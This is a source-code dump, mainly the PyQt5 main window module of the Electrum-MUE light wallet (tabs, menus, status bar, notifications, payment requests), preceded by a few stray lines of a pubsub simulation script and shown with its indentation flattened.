"""Sets up a pubsub simulation environment with one publisher and 5 subscribers"""
p = Thread(target=publisher)
p.start()
if __name__ == '__main__':
run_publisher()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Electrum-MUE - lightweight MUE client
# Copyright (C) 2018 random.zebra
# Copyright (C) 2018 sotblad
import sys, time, threading
import os, json, traceback
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
from PyQt5.QtCore import Qt
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electrum.util import bh2u, bfh
from electrum import keystore, simple_config
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS, NetworkConstants
from electrum.plugins import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates)
from electrum import Transaction
from electrum import util, bitcoin, commands, coinchooser
from electrum import paymentrequest
from electrum.wallet import Multisig_Wallet
try:
from electrum.plot import plot_history
except:
plot_history = None
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import *
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electrum.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
notify_transactions_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.tx_external_keypairs = {}
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 8)
self.fee_unit = config.get('fee_unit', 0)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.notify_transactions_signal.connect(self.notify_transactions)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified', 'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
self.fetch_alias()
def on_history(self, b):
self.new_fx_history_signal.emit()
def on_fx_history(self):
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
self.notify_transactions_signal.emit()
elif event in ['status', 'banner', 'verified', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum-MUE Testnet" if NetworkConstants.TESTNET else "Electrum-MUE"
title = '%s %s - %s' % (name, self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
wallet_folder = self.get_wallet_folder()
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
wallet_folder = self.get_wallet_folder()
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
hist_menu = wallet_menu.addMenu(_("&History"))
hist_menu.addAction("Plot", self.plot_history_dialog).setEnabled(plot_history is not None)
hist_menu.addAction("Export", self.export_history_dialog)
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in OSX using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("http://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Bitcoin system." + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"))
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
# Combine the transactions if there are more then three
tx_amount = len(self.tx_notifications)
if(tx_amount >= 3):
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
total_amount += v
self.notify(_("%(txs)s new transactions received: Total amount received in the new transactions %(amount)s") \
% { 'txs' : tx_amount, 'amount' : self.format_amount_and_units(total_amount)})
self.tx_notifications = []
else:
for tx in self.tx_notifications:
if tx:
self.tx_notifications.remove(tx)
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
self.notify(_("New transaction received: %(amount)s") % { 'amount' : self.format_amount_and_units(v)})
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, QIcon(":icons/electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
sender.timer_signal.connect(self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, self.num_zeros, self.decimal_point, whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
if self.fee_unit == 0:
return format_satoshis(fee_rate/1000, False, self.num_zeros, 0, False) + ' sat/byte'
else:
return self.format_amount(fee_rate) + ' ' + self.base_unit() + '/kB'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
assert self.decimal_point in [2, 5, 8]
if self.decimal_point == 2:
return 'bits'
if self.decimal_point == 5:
return 'mMUE'
if self.decimal_point == 8:
return 'MUE'
raise Exception('Unknown base unit')
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else None
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging (%d blocks)"%server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected.png")
else:
icon = QIcon(":icons/status_connected_proxy.png")
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return l
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.NoFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = self.password_dialog(msg)
if password:
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(addr)
self.request_list.update()
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
